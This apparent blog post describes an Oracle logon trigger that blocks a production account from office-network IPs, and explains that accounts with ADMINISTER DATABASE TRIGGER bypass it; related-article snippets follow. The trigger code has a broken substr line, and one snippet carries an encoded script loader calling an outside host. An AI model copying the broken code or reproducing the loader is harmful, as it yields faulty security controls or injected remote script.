数据库用户避开了LOGON_AUDIT触发器

最新推荐文章于 2021-04-14 01:46:23 发布
最新推荐文章于 2021-04-14 01:46:23 发布
阅读量1.3k 收藏
点赞数
分类专栏: oracle_安全
本文介绍了一种通过创建LOGON_AUDIT触发器来防止生产账号从办公网络非法登录的方法,详细解释了触发器的实现原理及在实际应用中遇到的问题与解决方案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

为了防止从办公网络试用生产账号登陆生产主机非法获取用户信息(因为我们的生产账号是不作审计的,个人账号作审计,因此要避免生产账号从办公网络登陆主机),我们写了个LOGON_AUDIT的触发器,如下:

CREATE OR REPLACE TRIGGER sys.LOGON_AUDIT 
  AFTER LOGON ON DATABASE 
  declare 
  lv_user varchar2(100); 
  lv_host varchar2(100); 
  lv_schema varchar2(100); 
  lv_suser varchar2(100); 
  lv_ip varchar2(100); 
  BEGIN 
  select sys_context(‘USERENV’, ‘HOST’), 
  sys_context(‘USERENV’, ‘CURRENT_USER’), 
  sys_context(‘USERENV’, ‘CURRENT_SCHEMA’), 
  sys_context(‘USERENV’, ‘SESSION_USER’), 
  sys_context(‘USERENV’, ‘IP_ADDRESS’) 
  into lv_host, lv_user, lv_schema, lv_suser, lv_ip 
  from dual; 
  if lv_suser = ‘USERNAME’ then 
  if substr(lv_ip, 1,  in (‘xx.xx.xx’) 
  or lv_ip is null 
  then 
  null ; 
  else 
  RAISE_APPLICATION_ERROR(-20001, ‘CONNECTIION REFUSED’||lv_ip); 
  end if; 
  end if; 
  END;

  测试的时候,通过,可是在正式使用中,却发现有的生产主机没有办法拒绝办公网络的登陆.那就查问题呗.

  查来查去,发现似乎应该是权限的问题.在检查,发现凡是不能拒绝办公网络登陆的数据库用户有一个IMP_FULL_DATABASE的角色.这个角色的权限非常的高,仔细检查这个角色的权限,发现其中有一个权限为:ADMINISTER DATABASE TRIGGER,将这个权限从用户上revoke后,登陆就会被拒绝,如果将这个权限授予用户,就会避开系统的LOGON_AUDIT触发器,能继续登陆,问题是找到了,啥时候能重新授权列,只能等待,慢慢的等到系统上线或者例行维护的时候了,这个权限的重新授予风险还是很高的.不过问题找到了就ok.

存储过程和触发器-LOGON/LOGOFF触发器
似水流年
04-18 3356
/* LOGON触发器用户登录数据库的时候被触发 LOGOFF触发器用户注销时被触发 使用两个触发器可以将用户访问数据库的情况记录到一个日志表中 */ --用于测试LOGON触发器和LOGOFF触发器的表 DROP TABLE TESTLOG; DROP TRIGGER MYLOGONTRIGGER; DROP TRIGGER MYLOGOFFTRIGGER; CREATE TABLE TESTLOG( USERNAME VARCHAR2(100), EVENTTIM
oracle sp2-0157,Oracle数据库之生产环境audit_trail参数作用和问题
weixin_39540725的博客
04-03 1166
本文主要向大家介绍了Oracle数据库之生产环境audit_trail参数作用和问题,通过具体的内容向大家展现,希望对大家学习Oracle数据库有所帮助。1、audit_trail 默认值SQL> show parameter audit_trailNAME TYPE VALUEaudit_t...
查看登录oracle数据库用户记录.docx
06-06
查找访问orcale数据库用户名称或IP地址
登陆触发器AFTER LOGON ON DATABASE对具有DBA权限的不起作用
10-05 767
 HTML Tags and JavaScript tutorialvar encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);
Logon database Tiger引起DataGuard不同步问题
aodiyi6351的博客
08-09 303
当DataGuard升级CPU后。发现主备库不能同步了,日志报错,所以在主库的运行的升级的后脚本“@catbundle.sql cpu apply”不能同步到备库 现象: broker状态: [oracle@webdb2 ~]$ dgmgrl sys/oracle DGMGRL for Linux: Version 11.2.0.3.0 -64bit Prod...
SQLServer之创建LOGON触发器
小子pk了的博客
10-18 1232
LOGON触发器工作原理 登录触发器将为响应 LOGON 事件而激发存储过程。 与 SQL Server实例建立用户会话时将引发此事件。 登录触发器将在登录的身份验证阶段完成之后且用户会话实际建立之前激发。 因此,来自触发器内部且通常将到达用户的所有消息(例如错误消息和来自 PRINT 语句的消息)会传送到 SQL Server 错误日志。 如果身份验证失败,将不激发登录触发器LOGON触...
[Oracle] 如何使用触发器实现IP限制用户登录
12-15
在这个触发器`logon_ip_control`中,`AFTER LOGON ON DATABASE`指定了触发器的类型和时机,即在用户登录数据库之后执行。`DECLARE`块定义了两个变量`ip`和`user`,用于存储用户的IP地址和用户名。接下来的`SELECT`...
seer_logon_e:星小夜登陆器源码,易语言版本-易
03-24
用户可以从下载完整的登录器 函数无注释例子 原始码使用方法 原始码可能无法正常编译,但我确实什么都没有删除,如果附加什么支持库请自行安装 源码位于源文件夹中,后缀为.e └─source ├─dm ├─LocalStorage
Customer_Remote_Logon_Depot_Help.pdf
04-21
Customer Remote Logon Depot是一个为用户提供的平台,旨在安全地存储登录数据,用户仅需为每个系统创建一次登录数据,之后这些数据即可被用于各种目的,比如处理事件(incident processing)、咨询服务(consulting...
logon_monitor
05-20
logon_monitor 要求: Windows 2008以上 概述: 这是用于在用户登录服务器时监视服务器状态的旧脚本。 特征: 登录用户信息 远程计算机名称(可能时已登录并执行ping操作) 当前正在运行的进程列表 当前正在...
logon on database记录登入信息的trigger
01-18 260
今天想起写一个登陆数据库数据库级别的trigger,记录每次登陆的时间和人员名称,以下是具体的构建思路。 SQL> create table loggon01(id number,name varchar2(80),lo...
oracle 用户避开logon_audit触发器,1.Oracle杂记——登陆触发器
weixin_39946313的博客
04-14 158
1.Oracle杂记——登陆触发器创建一个表:audit_conn如下:Create table audit_conn (username varchar2(30),ipvarchar(20),vdate timestamp);然后创建登陆触发器如下:create or replace triggerlogon_auditafter logon on databasedeclarev_term...
触发器限制指定IP访问oracle数据库
数据库
04-22 440
---------------------来自德哥的BLOG,觉着很有用,记录一下-------------------<wbr style="line-height:25px"></wbr> 最近有个项目需要限制某些数据库用户的访问来源IP,在PG中比较好实现,但是ORACLE没有比较简便的操作。 如果不管用户的话,仅仅限制来源IP对监听的访问是比较容易实现的,通过配...
oracle登录后查看数据库,查看Oracle数据库用户登录的记录
weixin_33561910的博客
04-02 1031
Oracle 中记录用户登录信息我们可以使用 Oracle Audit 函数来记录用户登录信息,但是如果开放了 Audit 函数将会使Oracle 性能下降,甚至导致 Oracle 崩溃。那我们如何才能记录用户登录信息呢?其实我们可以通过建立触发器的方式来实现。方法如下:1. 用 sys 用户登录 Oracle2. 创建记录用户登录信息的表CREATE TABLE LOG$INFORMATION ...
2017-03-08 DBA日记,sql语句绑定变量及after logon database触发器的影响
IT匠人的专栏
04-04 423
手记一: 背景:今日有个DBA的同事和我说一个关于sql语句写法导致硬解释的case ,特滋记录 过程: 当cursor_sharing=force 时,如下sql语句是不会重用执用执行计划的: SQL1: select name --不需要显示全部字段 from author where id=1; SQL2: select na
Oracle数据库用户登录触发器实现
通过在数据库级别定义一个after logon触发器,每当用户成功登录时,这些信息将被自动记录到名为logon_table的表中。" 在Oracle数据库中,触发器是一种特殊的存储过程,它会在特定的数据库事件发生时自动执行,如...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值